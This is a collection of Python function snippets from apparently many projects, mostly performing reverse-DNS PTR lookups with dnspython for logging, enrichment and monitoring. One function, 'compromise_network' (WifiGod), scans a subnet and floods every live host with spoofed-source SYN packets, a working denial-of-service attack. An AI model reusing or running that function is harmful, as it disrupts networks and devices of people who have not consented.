def main(): output_file_name = "ptr_output" file = open(f"{output_file_name}.csv", "w", encoding="utf8") file.write("NAME;MSISDN;IP;ARPA;DOMAIN;NEW_IP;ARPA_NEW;NEW_DOMAIN\n") with open('ptr_examples.csv', encoding="utf8") as csv_read: csv_reader = readfile(csv_read) for row in csv_reader: try: rev_addr = reversename.from_address(row["FRAMED-IP-ADDRESS"]) except dnsexception.SyntaxError: rev_addr = "Null" try: new_rev_addr = reversename.from_address( row["FRAMED-IP-ADDRESS NEW"]) except dnsexception.SyntaxError: new_rev_addr = "Null" try: domain = resolver.query(rev_addr, "PTR")[0] except resolver.NXDOMAIN: domain = "NXDOMAIN" try: new_domain = resolver.query(rev_addr, "PTR")[0] except resolver.NXDOMAIN: new_domain = "NXDOMAIN" file.write( f"{row['NAME']};{row['MSISDN']};{row['FRAMED-IP-ADDRESS']};" f"{rev_addr};{domain};{row['FRAMED-IP-ADDRESS NEW']};{new_rev_addr};{new_domain}\n" ) file.close() create_xlsx_copy(output_file_name)
def dns_traffic(interface,ip_address): while True: packet = sniff(iface=interface, count=1) for pck in packet: if(pck.haslayer(IP)): ip_src = pck.getlayer(IP).src ip_dst = pck.getlayer(IP).dst if(ip_src == ip_address or ip_dst == ip_address): if(pck.haslayer(DNS)): try: hostname = pck.getlayer(DNS).qd.qname except: hostname = 'unknown' if(ip_src != ip_address): try: addr = reversename.from_address(ip_src) server_name = resolver.query(addr, "PTR")[0] except: server_name = 'unknown' elif(ip_dst != ip_address): try: addr = reversename.from_address(ip_dst) server_name = resolver.query(addr, "PTR")[0] except: server_name = 'unknown' if(pck.haslayer(DNS)): print(c.g+"{}"+c.w+" --> "+c.g+"{}"+c.g+" {} "+c.w+"| Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,hostname,server_name) else: print(c.g+"{}"+c.w+" --> "+c.g+"{}"+c.w+" | Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,server_name)
def main(): import eventlet try: from dns import reversename except ImportError: print('skip:require dns (package dnspython)') return eventlet.monkey_patch(all=True) reversename.from_address('127.0.0.1') print('pass')
def reverse_dns_lookup(ip): try: addr = reversename.from_address(ip) return resolver.query(addr, "PTR")[0] except Exception as e: print(e) return None
def get_dnsname(ipaddress): myresolve = Resolver() a = from_address(ipaddress) name = myresolve.query(a, 'PTR')[0] return str(name)[:-1]
def resolve_queue_thread(self): logging.debug('Running resolve queue thread') while True: ip_address, cb = self.queue.get(True) logging.debug('Received request to resolve {}'.format(ip_address)) rev_name = reversename.from_address(ip_address) try: hostname = str(resolver.query(rev_name, "PTR")[0]) self.cache[ip_address] = (hostname, 'resolved') logging.debug('Done resolving! {} --> {}'.format( ip_address, hostname)) if cb: cb(ip_address, hostname) except resolver.NoNameservers: self.cache[ip_address] = (None, 'bad') if cb: cb(ip_address, None) except dns.resolver.Timeout: self.cache[ip_address] = (None, 'bad') if cb: cb(ip_address, None) except dns.resolver.NXDOMAIN: self.cache[ip_address] = (None, 'bad') if cb: cb(ip_address, None)
def reverse_lookup(ip): """ Résoudre une adresse IP en son nom inversé. @requires: dnspython3 @param ip: chaîne de type A.B.C.D @return: dictionnaire aux clés "name" et "status" """ address = reversename.from_address(ip) resolver = dnsresolver.Resolver() # Configurer le resolver resolver.timeout = 1.25 # par serveur dns resolver.lifetime = 3.75 # timeout total # Demander le RRSet PTR, renvoyer timeout si timeout try: ptr_rrset = resolver.query(address, 'PTR').rrset except dnsresolver.Timeout: return {'name': '', 'status': STATUS['timeout']} except dnsresolver.NoAnswer: return {'name': '', 'status': STATUS['noanswer']} except dnsresolver.NoNameservers: return {'name': '', 'status': STATUS['nonameservers']} except dnsresolver.NXDOMAIN: return {'name': '', 'status': STATUS['nxdomain']} # Un Resource Record Set est normalement renseigné if len(ptr_rrset) > 0: return {'name': ptr_rrset[0].to_text(), 'status': STATUS['ok']} # Ce cas ne devrait jamais être atteint return {'name': '', 'status': 99}
def changeName(self, connection, name): self.accessLock.acquire() connectMessages = { \ 1: "<links in from Cyan Worlds Age>", \ 4: "<links in from Cyan Guest Age>", \ } if(len(name) < 20 and len(name) > 1 and self.findByName(connection.name[0] + name) == None): self.debugMsg(connection, "Setting name to '%s' - login - successful" % name) oldname = connection.name[1:] wasnamed = connection.named connection.name = connection.name[0] + name connection.named = 1 connection.send("11") if(wasnamed and self.parent.prefs["enable_protocol_extensions"]): self.sendChat(connection, "<[%s] is now known as [%s]>" % (oldname, name), 2) elif(connectMessages.has_key(connection.level())): self.sendChat(connection, connectMessages[connection.level()], 2) elif(HAS_DNSPYTHON and self.parent.prefs["use_reverse_dns"]): try: addr = reversename.from_address(connection.addr[0]) host = '.'.join(str(resolver.query(addr, "PTR")[0]).split('.')[-3:-1]) except: host = "somewhere on the internet" self.sendChat(connection, "<links in from %s Age>" % host, 2) else: self.sendChat(connection, "<links in from somewhere on the internet Age>", 2) self.sendUserList() self.parent.totallogins += 1 if(self.currentlogins() > self.parent.maxlogins): self.parent.maxlogins = self.currentlogins() else: log(self, "rejecting name: %s" % name, 2) connection.send("10") self.accessLock.release()
def scan_subnets(subnets): nmap_args = ["-nsP"] + [item for item in subnets] vlans = nmap(nmap_args) ip_patt = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' p = re.compile(ip_patt) #p.findall(vlans.stdout) active_ips = p.findall(vlans.stdout) #storage_ips = [iptools.IpRangeList(subnet) for subnet in subnets] subnet_ips = {subnet: iptools.IpRangeList(subnet) for subnet in subnets} ip_usage = {} for subnet, ip_range in subnet_ips.iteritems(): ip_list = [] for ip in ip_range: #print ip try: host = reversename.from_address(ip) #in case there are multiple reverse entries for a #given IP names = [nm.to_text() for nm in resolver.query(host, 'PTR')] name = ','.join(names) except resolver.NXDOMAIN: name = '' if ip in active_ips: ip_list.append([ip, 'ACTIVE', name]) else: ip_list.append([ip, 'INACTIVE', name]) ip_usage[subnet] = ip_list return ip_usage
def resolve(self, event, record, host, nameserver): ipaddr = re.compile(r'\d+\.\d+\.\d+\.\d+') if not record: if ipaddr.search(host): host = from_address(host) record = 'PTR' else: record = 'A' resolver = Resolver() if nameserver: if not ipaddr.search(nameserver): nameserver = resolver.query(nameserver, 'A')[0].address resolver.nameservers = [nameserver] try: answers = resolver.query(host, str(record)) except NoAnswer: event.addresponse( u"I couldn't find any %(type)s records for %(host)s", { 'type': record, 'host': host, }) return except NXDOMAIN: event.addresponse(u"I couldn't find the domain %s", host) return responses = [] for rdata in answers: responses.append(unicode(rdata)) event.addresponse(u'Records: %s', human_join(responses))
def find_dns_cdn(self, domain, depth=0): """Recursively check a CNAME chain""" from dns import resolver, reversename dns_resolver = resolver.Resolver() dns_resolver.timeout = 1 provider = self.check_cdn_name(domain) # First do a CNAME check if provider is None: try: answers = dns_resolver.query(domain, 'CNAME') if answers and len(answers): for rdata in answers: name = '.'.join(rdata.target).strip(' .') if name != domain: provider = self.check_cdn_name(name) if provider is None and depth < 10: provider = self.find_dns_cdn(name, depth + 1) if provider is not None: break except Exception: pass # Try a reverse-lookup of the address if provider is None: try: addresses = dns_resolver.query(domain) if addresses: addr = str(addresses[0]) addr_name = reversename.from_address(addr) if addr_name: name = str(dns_resolver.query(addr_name, "PTR")[0]) if name: provider = self.check_cdn_name(name) except Exception: pass return provider
def reverseDns(ip): try: rev_name = reversename.from_address(ip) reversed_dns = str(resolver.query(rev_name, "PTR")[0]) return reversed_dns except: return 'N/A'
def name_finder(ip_inner): try: rev_name = reversename.from_address(str(ip_inner)) reversed_dns = str(resolver.query(rev_name, 'PTR')[0]) print(ip_inner, " ", reversed_dns) except: print(ip_inner, ' dead')
def insert_record(target, record): """Add a record.""" name = "Not resolved" if parameters.get_admin("ENABLE_RLOOKUPS") == "yes": addr = reversename.from_address(record.source_ip) try: resp = resolver.query(addr, "PTR") node = resp[0].target while len(node.labels) > 3: node = node.parent() name = node except (resolver.NXDOMAIN, resolver.NoNameservers, resolver.Timeout): pass if name not in target: target[name] = {} if record.source_ip not in target[name]: target[name][record.source_ip] = { "total": 0, "spf": {"pass": 0, "fail": 0}, "dkim": {"pass": 0, "fail": 0} } target[name][record.source_ip]["total"] += record.count for typ in ["spf", "dkim"]: result = getattr(record, "{}_result".format(typ)) target[name][record.source_ip][typ][result] += record.count
def get(self, ip): t1 = time.time() self.valid_args(ip) # Iterate through nameservers so that we can tell which one gets used. nameservers = current_app.config['RESOLVERS'] for nameserver in nameservers: dns_resolver.nameservers = [nameserver] try: # http://stackoverflow.com/a/19867936/1707152 answer = dns_resolver.query( reversename.from_address(ip), rdatatype.PTR, raise_on_no_answer=False) # Successful query break except Timeout as e: # Communication fail or timeout - try next nameserver if nameserver is nameservers[-1]: current_app.logger.info(e) return {'message': 'All nameservers timed out.'}, 503 continue except NXDOMAIN: return {'message': 'No nameserver found for %s' % ip}, 404 except Exception as e: current_app.logger.error(e) return {'message': 'An unexpected error occured.'}, 500 t2 = time.time() duration = t2 - t1 if answer is None: return {'message': 'An unexpected error occured.'}, 500 return parse_query(answer, nameserver, duration)
def _enrich_hosts(self, unique_hosts): enriched_hosts = [] if self.config.processing.reverse_dns: d = dns.resolver.Resolver() d.timeout = 5.0 d.lifetime = 5.0 while unique_hosts: ip = unique_hosts.pop() inaddrarpa = "" hostname = "" if self.config.processing.reverse_dns: try: inaddrarpa = d.query(from_address(ip), "PTR").rrset[0].to_text() except: pass for request in self.dns_requests.values(): for answer in request['answers']: if answer["data"] == ip: hostname = request["request"] break if hostname: break enriched_hosts.append({"ip": ip, "country_name": self._get_cn(ip), "hostname": hostname, "inaddrarpa": inaddrarpa}) return enriched_hosts
def check_hosting(self): """Pull the data needed to determine the hosting""" start = monotonic.monotonic() self.hosting_results['base_page_ip_ptr'] = '' self.hosting_results['base_page_cname'] = '' self.hosting_results['base_page_dns_server'] = '' domain = None if self.task is not None and 'page_data' in self.task and \ 'document_hostname' in self.task['page_data']: domain = self.task['page_data']['document_hostname'] if domain is not None: try: from dns import resolver, reversename dns_resolver = resolver.Resolver() dns_resolver.timeout = 5 dns_resolver.lifetime = 5 # reverse-lookup the edge server try: addresses = dns_resolver.query(domain) if addresses: addr = str(addresses[0]) addr_name = reversename.from_address(addr) if addr_name: name = str(dns_resolver.query(addr_name, "PTR")[0]) if name: self.hosting_results[ 'base_page_ip_ptr'] = name.strip('. ') except Exception: pass # get the CNAME for the address try: answers = dns_resolver.query(domain, 'CNAME') if answers and len(answers): for rdata in answers: name = '.'.join(rdata.target).strip(' .') if name != domain: self.hosting_results['base_page_cname'] = name break except Exception: pass # get the name server for the domain done = False while domain is not None and not done: try: dns_servers = dns_resolver.query(domain, "NS") dns_name = str(dns_servers[0].target).strip('. ') if dns_name: self.hosting_results[ 'base_page_dns_server'] = dns_name done = True except Exception: pass pos = domain.find('.') if pos > 0: domain = domain[pos + 1:] else: domain = None except Exception: pass self.hosting_time = monotonic.monotonic() - start
def get(self, ip): t1 = time.time() self.valid_args(ip) # Iterate through nameservers so that we can tell which one gets used. nameservers = current_app.config['RESOLVERS'] for nameserver in nameservers: dns_resolver.nameservers = [nameserver] try: # http://stackoverflow.com/a/19867936/1707152 answer = dns_resolver.query(reversename.from_address(ip), rdatatype.PTR, raise_on_no_answer=False) # Successful query break except Timeout as e: # Communication fail or timeout - try next nameserver if nameserver is nameservers[-1]: current_app.logger.info(e) return {'message': 'All nameservers timed out.'}, 503 continue except NXDOMAIN: return { 'message': 'No nameserver found for the provided IP' }, 404 except Exception as e: current_app.logger.error(e) return {'message': 'An unexpected error occured.'}, 500 t2 = time.time() duration = t2 - t1 if answer is None: return {'message': 'An unexpected error occured.'}, 500 return parse_query(answer, nameserver, duration)
def domain_details(domain): ''' Return dictionary of domain name, IP, and reverse DNS''' details = {} details['domain'] = domain details['ip'] = str(socket.gethostbyname(domain)) details['reverse_dns'] = str(reversename.from_address(details['ip'])) return details
def resolve_PTR(ip): try: addr = str(reversename.from_address(ip)).rstrip('.') data = dns.resolver.query(addr, 'PTR') return data except: return None
def reverse_lookup(ip): try: return extract_record_data( prepare_rdata(str(reversename.from_address(ip))), "PTR").get("PTR")[0] except Exception as err: return "ERROR: " + "CANNOT RESOLVE"
def resolve(self, event, record, host, nameserver): ipaddr = re.compile(r"\d+\.\d+\.\d+\.\d+") if not record: if ipaddr.search(host): host = from_address(host) record = "PTR" else: record = "A" resolver = Resolver() if nameserver: if not ipaddr.search(nameserver): nameserver = resolver.query(nameserver, "A")[0].address resolver.nameservers = [nameserver] try: answers = resolver.query(host, str(record)) except NoAnswer: event.addresponse(u"I couldn't find any %(type)s records for %(host)s", {"type": record, "host": host}) return except NXDOMAIN: event.addresponse(u"I couldn't find the domain %s", host) return responses = [] for rdata in answers: responses.append(unicode(rdata)) event.addresponse(u"Records: %s", human_join(responses))
def get_hostnames_for_ip (ip): try: from dns import reversename, resolver rev_name = reversename.from_address(ip) return [str(x) for x in resolver.query(rev_name,"PTR")] except: return []
def _url_resolve(self): if self.initialized: """ Check the URL typ """ if re.match(ipv4_v2, self.host, re.IGNORECASE): """ Resolve the IP to a domain """ self.ip = self.host try: socket.inet_aton(self.ip) self.domain = socket.getfqdn(self.ip) rev_name = reversename.from_address(self.ip) self.dns_ptr = str(resolver.query(rev_name, "PTR")[0]) except Exception as msg: return None elif re.match(domain, self.host, re.IGNORECASE) or re.match( domain2, self.host, re.IGNORECASE): self.domain = self.host try: self.ip = socket.gethostbyname(self.domain) except Exception as msg: return None else: logger.error("Unsupported URL: %s" % self.url) return None
def _enrich_hosts(self, unique_hosts): enriched_hosts = [] if cfg.processing.reverse_dns: d = dns.resolver.Resolver() d.timeout = 5.0 d.lifetime = 5.0 while unique_hosts: ip = unique_hosts.pop() inaddrarpa = "" hostname = "" if cfg.processing.reverse_dns: try: inaddrarpa = d.query(from_address(ip), "PTR").rrset[0].to_text() except: pass for request in self.dns_requests.values(): for answer in request["answers"]: if answer["data"] == ip: hostname = request["request"] break if hostname: break enriched_hosts.append({ "ip": ip, "country_name": self._get_cn(ip), "hostname": hostname, "inaddrarpa": inaddrarpa }) return enriched_hosts
def check_hostname(hostname): log.debug('Checking DNS entry on %s' % hostname) yandex_family = dns.resolver.Resolver() # # Yandex family resolvers 77.88.8.7 77.88.8.3 yandex_family.nameservers = ['77.88.8.7', '77.88.8.3'] ips = [] try: ans = yandex_family.query(hostname, 'A', raise_on_no_answer=False) ips = [a.to_text() for a in ans] except dns.exception.DNSException: pass # IPanswers = yandex_family.query(hostname, 'A', raise_on_no_answer=False) log.debug('Found following results %s' % str(ips)) for IP in ips: #for each response reverse_hostname = "" # reverse resolve # Shoud not be safe?.yandex.ru try: log.debug('Doing reverse DNS on %s !!' % str(IP)) reverse_hostname = str( yandex_family.query(reversename.from_address(IP), 'PTR')[0]) except dns.exception.DNSException: pass if reverse_hostname: blocked_result = re.match(r'safe.*\.yandex\.ru', reverse_hostname) if blocked_result is not None: log.debug('Hostname %s has do be blocked !!' % hostname) return False else: log.debug('Hostname %s is okay' % hostname) return True
def getFQDN(): d = open("alive.txt", "w+") d.write("IP Address\t\tDomain Name\n") d.write("_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n") e = open("sleep.txt", "w+") e.write("IP Address\t\tDomain Name\n") e.write("_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n") list = [] for line in open('iplist.txt', 'r'): list.append(line.strip()) print("\nResolving IP addresses...") x = 0 for ip in list: try: addr = reversename.from_address(list[x]) result=str(resolver.query(addr,"PTR")[0]) d.write(list[x] + "\t" + result + "\n") # print(list[x] + "\t" + result) x += 1 except: e.write(list[x] + "\t\t" + "Not Found" + "\n") # print(list[x] + "\t" + "Not Found") x += 1 d.close() e.close() storage = os.getcwd() print("\nTask Complete! Results are stored in the following path:\n" + storage + "\n")
def process(self): event = self.receive_message() keys = ["source.%s", "destination.%s"] for key in keys: ip_key = key % "ip" if ip_key not in event: continue ip = event.get(ip_key) ip_version = IPAddress.version(ip) ip_integer = IPAddress.to_int(ip) if ip_version == 4: minimum = MINIMUM_BGP_PREFIX_IPV4 elif ip_version == 6: minimum = MINIMUM_BGP_PREFIX_IPV6 cache_key = bin(ip_integer)[2:minimum + 2] cachevalue = self.cache.get(cache_key) result = None if cachevalue == DNS_EXCEPTION_VALUE: continue elif cachevalue: result = cachevalue else: rev_name = reversename.from_address(ip) try: results = resolver.query(rev_name, "PTR") expiration = results.expiration for result in results: # use first valid result if event.is_valid('source.reverse_dns', str(result)): break else: raise InvalidPTRResult except (dns.exception.DNSException, InvalidPTRResult) as e: # Set default TTL for 'DNS query name does not exist' error ttl = None if isinstance(e, dns.resolver.NXDOMAIN) else \ getattr(self.parameters, "cache_ttl_invalid_response", 60) self.cache.set(cache_key, DNS_EXCEPTION_VALUE, ttl) result = None else: ttl = datetime.fromtimestamp(expiration) - datetime.now() self.cache.set(cache_key, str(result), ttl=int(ttl.total_seconds())) if result is not None: event.add(key % 'reverse_dns', str(result), overwrite=True) self.send_message(event) self.acknowledge_message()
def compromise_network(): interface = raw_input("Network Interface: ") print("Net Range Example: 192.168.1.0-255") net_range = raw_input("Net Range: ") start_ip = net_range.split('-')[0] end_range = net_range.split('-')[1] octet_count = 0 ip_base = '' live_ip_addr = [] for octet in start_ip: if(octet == '.'): octet_count += 1 if(octet_count == 3): ip_base += octet break; ip_base += octet for ip_addr in range(int(end_range)+1): try: socket.gethostbyaddr(ip_base+str(ip_addr)) live_ip_addr.append(ip_base+str(ip_addr)) try: addr = reversename.from_address(ip_base+str(ip_addr)) device_hostname = resolver.query(addr, "PTR")[0] except: device_hostname = '(unknown)' print("[WifiGod] Found Device: {} | {}").format(ip_base+str(ip_addr), device_hostname) except: pass print("[WifiGod] Found {} Devices").format(len(live_ip_addr)) def attack_net(device,interface): try: payload = str("A" * 1000) packet = IP(src=RandIP(),dst=device)/TCP(flags="S",sport=RandShort(),dport=RandShort())/payload sendp(packet,iface=interface,loop=1,verbose=False) except: pass # def attack_net(device): # try: # while True: # payload = str("A" * 5000) # sock=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.SOCK_DGRAM) # sock.sendto(payload, (device,RandShort())) # except: # raise print("[WifiGod] Initiating Attack...") # live_ip_addr = ['192.168.1.1'] for ip in live_ip_addr: try: # for i in range(10): t =threading.Thread(target=attack_net,args=(ip,interface)) t.setDaemon(True) t.start() except: pass x = raw_input("[WifiGod] Press Enter to stop...") try: exit(0) except: sys.exit(1)
def process(self): event = self.receive_message() if event is None: self.acknowledge_message() return keys = ["source.%s", "destination.%s"] for key in keys: ip_key = key % "ip" if not event.contains(ip_key): continue ip = event.value(ip_key) ip_version = IPAddress.version(ip) ip_integer = IPAddress.to_int(ip) if ip_version == 4: minimum = MINIMUM_BGP_PREFIX_IPV4 elif ip_version == 6: minimum = MINIMUM_BGP_PREFIX_IPV6 else: self.logger.error("Invalid IP version {!r}".format(ip_version)) self.send_message(event) self.acknowledge_message() cache_key = bin(ip_integer)[2:minimum + 2] cachevalue = self.cache.get(cache_key) result = None if cachevalue: result = cachevalue else: rev_name = reversename.from_address(ip) try: result = resolver.query(rev_name, "PTR") expiration = result.expiration result = result[0] except dns.exception.DNSException as e: if isinstance(e, dns.resolver.NXDOMAIN): continue else: ttl = datetime.fromtimestamp(expiration) - datetime.now() self.cache.set(cache_key, str(result), ttl=int(ttl.total_seconds())) if result is not None: event.add(key % 'reverse_dns', str(result), sanitize=True, force=True) self.send_message(event) self.acknowledge_message()
def rev_dns_lookup(ip_address): addr = reversename.from_address(ip_address) resolved_ip = resolver.query(addr, "PTR")[0] if resolved_ip: print(str(resolved_ip)) return resolved_ip else: return False
def getptr(ip): domain_address = reversename.from_address(ip) try: domain_name = resolver.resolve(domain_address, 'PTR') answer = domain_name.response.answer[0] except: answer = [] return answer
def ptr_lookup(ip): # reverse DNS lookup rev_ip = reversename.from_address(ip) try: return str(dns_resolver.query(rev_ip, "PTR")[0]) except (resolver.NXDOMAIN, resolver.Timeout, resolver.NoAnswer, IndexError): return "<no ptr>"
def getRDNS(ip): try: rev_name = reversename.from_address(ip) reversed_dns = str(resolver.query(rev_name, "PTR")[0]) except: reversed_dns = "Unknown" return reversed_dns
def get_hostname(self,ip): try: rev_name = reversename.from_address(ip) result = self.query(rev_name,"PTR").__iter__().next().to_text()[:-1] return "%s: %s\n"%(ip,result) except resolver.NXDOMAIN: return "%s: NXDOMAIN\n"%(ip) except exception.Timeout: return "%s: TIMEOUT\n"%(ip) except: return "%s: UNSPECIFIED ERROR\n"%(ip)
def process(self): event = self.receive_message() keys = ["source.%s", "destination.%s"] for key in keys: ip_key = key % "ip" if ip_key not in event: continue ip = event.get(ip_key) ip_version = IPAddress.version(ip) ip_integer = IPAddress.to_int(ip) if ip_version == 4: minimum = MINIMUM_BGP_PREFIX_IPV4 elif ip_version == 6: minimum = MINIMUM_BGP_PREFIX_IPV6 cache_key = bin(ip_integer)[2: minimum + 2] cachevalue = self.cache.get(cache_key) result = None if cachevalue == DNS_EXCEPTION_VALUE: continue elif cachevalue: result = cachevalue else: rev_name = reversename.from_address(ip) try: results = resolver.query(rev_name, "PTR") expiration = results.expiration for result in results: # use first valid result if event.is_valid('source.reverse_dns', str(result)): break else: raise InvalidPTRResult except (dns.exception.DNSException, InvalidPTRResult) as e: # Set default TTL for 'DNS query name does not exist' error ttl = None if isinstance(e, dns.resolver.NXDOMAIN) else \ getattr(self.parameters, "cache_ttl_invalid_response", 60) self.cache.set(cache_key, DNS_EXCEPTION_VALUE, ttl) result = None else: ttl = datetime.fromtimestamp(expiration) - datetime.now() self.cache.set(cache_key, str(result), ttl=int(ttl.total_seconds())) if result is not None: event.add(key % 'reverse_dns', str(result), overwrite=True) self.send_message(event) self.acknowledge_message()
def get_server_public_fqdn(): try: reslvr = resolver.Resolver() ipaddr = reversename.from_address(get_server_external_ip()) return str(reslvr.query(ipaddr, 'PTR')[0]).rstrip('.').lower() except Exception, e: web.debug('DEBUG: get_server_public_fqdn(): %s' % repr(e)) return ipaddr
def doReverseLookup(self, ip_address): #started = time.time() try: hostname = str(self.caller.resolver.query(reversename.from_address(ip_address), "PTR")[0]) except: hostname = None #if (time.time() - started) > 1: # print("Reverse lookup of %s(%s) took %s." % (ip_address, hostname, time.time() - started)) return hostname
def reverse_dns(ip): addr = reversename.from_address(ip) try: dns_name = resolver.query(addr, 'PTR')[0] except: dns_name = None return str(dns_name)
def process_mail(dict_general, temp_set, settings): """process_mail Arguments: dict_general {defaultdict(set)} -- Dictionary of sets dict_general[mail_user].(mail_ip_addresses) temp_set {set} -- Set with email addresses that authenticated from more than one ip settings {object} -- Settings from the class Config """ # pylint: disable=too-many-locals country_ignore = list(settings.country_ignore.split('\n')) pattern_org = list(settings.pattern_org.split('\n')) pattern_ip = list(settings.pattern_ip.split('\n')) dict_issues = defaultdict(list) for email_address in temp_set: logging.debug('Start processing email: %s', email_address) temp_list = [] for ip_address in dict_general[email_address]: # Check dns reverse name from the ip address rev_name = reversename.from_address(ip_address) try: reverse_dns = str(resolver.query(rev_name, "PTR", lifetime=2)[0]) except dns_exception.DNSException: reverse_dns = 'unknown' logging.debug(' IP: %s - Reverse: %s', ip_address, reverse_dns) # Request geoip from the not skipped ip addresses with dns reverse name if not check_ip_on_whitelist(reverse_dns, pattern_ip): json_ip = check_geoip(ip_address, settings.ipinfo_token) if 'bogon' not in json_ip: country = json_ip['country'] city = json_ip['city'] org = json_ip['org'] else: # IP Invalid/Bogon continue logging.debug(' Contry: %s - %s - %s', country, city, org) if country not in country_ignore: if not check_org_on_whitelist(org, pattern_org): # pylint: disable=C0301 temp_list.append(f'{country} - {city} - {ip_address} - {reverse_dns} - {org}') else: logging.debug(' %s skipped', country) if len(temp_list) > 1: dict_issues[email_address] = temp_list return dict_issues
def process(self): event = self.receive_message() if event is None: self.acknowledge_message() return keys = ["source.%s", "destination.%s"] for key in keys: ip_key = key % "ip" if not event.contains(ip_key): continue ip = event.value(ip_key) ip_version = IPAddress.version(ip) ip_integer = IPAddress.to_int(ip) if ip_version == 4: minimum = MINIMUM_BGP_PREFIX_IPV4 elif ip_version == 6: minimum = MINIMUM_BGP_PREFIX_IPV6 else: self.logger.error("Invalid IP version {!r}".format(ip_version)) self.send_message(event) self.acknowledge_message() cache_key = bin(ip_integer)[2: minimum + 2] cachevalue = self.cache.get(cache_key) result = None if cachevalue: result = cachevalue else: rev_name = reversename.from_address(ip) try: result = resolver.query(rev_name, "PTR") expiration = result.expiration result = result[0] except dns.exception.DNSException as e: if isinstance(e, dns.resolver.NXDOMAIN): continue else: ttl = datetime.fromtimestamp(expiration) - datetime.now() self.cache.set(cache_key, str(result), ttl=int(ttl.total_seconds())) if result is not None: event.add(key % 'reverse_dns', str(result), sanitize=True, force=True) self.send_message(event) self.acknowledge_message()
def ptr_lookup(ip): # reverse DNS lookup rev_ip = reversename.from_address(ip) try: return str(dns_resolver.query(rev_ip,"PTR")[0]) except (resolver.NXDOMAIN, resolver.Timeout, resolver.NoAnswer, IndexError): return "<no ptr>"
def lookup(host): ip = IP(host) addr = reversename.from_address(str(ip)) try: return str(resolver.query(addr, "PTR")[0]).rstrip(".") except (resolver.NoAnswer, resolver.NXDOMAIN): if ip.iptype() == "IPV4MAP": return str(ip.v46map()) return str(ip)
def _ptr_lookup(self): ptraddr = reversename.from_address(self.address[0]) try: answers = resolver.query(ptraddr, 'PTR') except DNSException: answers = [] try: self.reverse_address = str(answers[0]) except IndexError: pass
def lookup_reverse(ip_address): """Perform a reverse lookup of IP address.""" try: type(ipaddress.ip_address(ip_address)) except ValueError: return {} record = reversename.from_address(ip_address) hostname = str(resolver.query(record, "PTR")[0])[:-1] return {'hostname': hostname}
def reverse(cls, address): if not cls.resolver: cls.resolver = resolver.Resolver() cls.resolver.nameservers = ['8.8.8.8', '8.8.4.4'] rev_name = reversename.from_address(address.strip()) print rev_name response = cls.resolver.query(rev_name, "PTR", raise_on_no_answer=True) return str(response[0])
def get_ip(source_field, values): """ Método que permite extraer información de la ip del log desde el propio sistema o obteniendola de la red. Args: source_field: Parametro que concierne al tipo de campo (IP,MAC,PORT,MSG) values: Objeto string que representa una fila del log leido Returns: La insercion de la informacion de IP en la BD y como resultado el identificador de la fila insertada """ ips_objects = Ips.objects.all() ip = (((re.compile(source_field + '=\S+')).search(values)).group(0)).split(source_field + '=')[1].strip("',") id_ip = 0 for it in ips_objects: if it.Ip == ip: id_ip = it # Aquí lo que hago es comprobar si existe una ip similar en la # tabla. Si no existe se inserta un nuevo registro de ip en la tabla. if not id_ip: hostname = '-' try: hostname, aliaslist, ipaddrlist = socket.gethostbyaddr(ip) except socket.error as msg: print "Get_ip -> ", msg try: address_dns = reversename.from_address(str(ip)) # Incluyo las siguientes lineas para dotar de menor tiempo # de procesamiento de resolucion de dns resolver = dns.resolver.Resolver() resolver.timeout = 1 resolver.lifetime = 1 if hostname == '-': for rdata in resolver.query(address_dns, "PTR"): hostname = rdata ips = Ips( Ip=ip, Hostname=hostname, Tag='-', ) ips.save() id_ip = ips except Exception as ex: print "get_ip -> ", ex return id_ip
def _ptr_lookup(self, environ): ip = environ.get('REMOTE_ADDR', '0.0.0.0') ptraddr = reversename.from_address(ip) try: answers = resolver.query(ptraddr, 'PTR') except DNSException: answers = [] try: environ['slimta.reverse_address'] = str(answers[0]) except IndexError: pass
def get_host_name(self, host, port=0): # Try IPv6 resolving try: socket.inet_pton(socket.AF_INET6, host) if have_dns: try: name = reversename.from_address(host) name = str(resolver.query(name, 'PTR')[0]).rstrip('.') log.debug('{0} resolved to {1}'.format(host, name)) return name except Exception as error: log.debug('{0} failed to resolve: {1}'.format(host, error)) return host else: return host except socket.error: pass # Try IPv4 resolving try: socket.inet_pton(socket.AF_INET, host) if have_dns: try: name = reversename.from_address(host) name = str(resolver.query(name, 'PTR')[0]).rstrip('.') log.debug('{0} resolved to {1}'.format(host, name)) return name except Exception as error: log.debug('{0} failed to resolve: {1}'.format(host, error)) return host else: name = socket.gethostbyaddr(host)[0] if name: log.debug('{0} resolved to {1}'.format(host, name)) return name except socket.error: pass # Give up log.debug('{0} failed to resolve: not an IP'.format(host)) return host
def reverse_lookup(self, ip, ns): """ Attempt to do a reverse DNS lookup to determine if the control and exp sets from a positive result resolve to the same domain, in order to remove false positives due to GeoIP load balancing. """ res = resolver.Resolver(configure=False) res.nameservers = [ns] n = reversename.from_address(ip) revn = res.query(n, "PTR").__iter__().next().to_text()[:-1] return revn
def _OriginRecord(ip): """Calculate the hostname to lookup for an IP. >>> _OriginRecord('8.8.8.8') 'moo' """ revname = reversename.from_address(ip).to_text() v4_index = revname.find('in-addr.arpa.') if v4_index: return revname[:v4_index] + 'origin.asn.cymru.com.' v6_index = revname.find('ip6.arpa.') if v6_index: return revname[:v6_index] + 'origin6.asn.cymru.com.'
def _ptr_lookup(self): try: ptraddr = reversename.from_address(self.address[0]) try: answers = resolver.query(ptraddr, 'PTR') except resolver.NXDOMAIN: answers = [] try: self.reverse_address = str(answers[0]) except IndexError: pass except Exception: logging.log_exception(__name__, query=self.address[0]) raise
def reverse_record_exists(ip_address): """ Checks if IP address have some reverse record somewhere. Does not care where it points. Returns True/False """ reverse = reversename.from_address(str(ip_address)) try: resolver.query(reverse, "PTR") except DNSException: # really don't care what exception, PTR is simply unresolvable return False return True
def _ptr_lookup(self, environ): ip = environ.get('REMOTE_ADDR', '0.0.0.0') try: ptraddr = reversename.from_address(ip) try: answers = dns_resolver.query(ptraddr, 'PTR') except NXDOMAIN: answers = [] try: environ['slimta.reverse_address'] = str(answers[0]) except IndexError: pass except Exception: log_exception(__name__, query=ip)
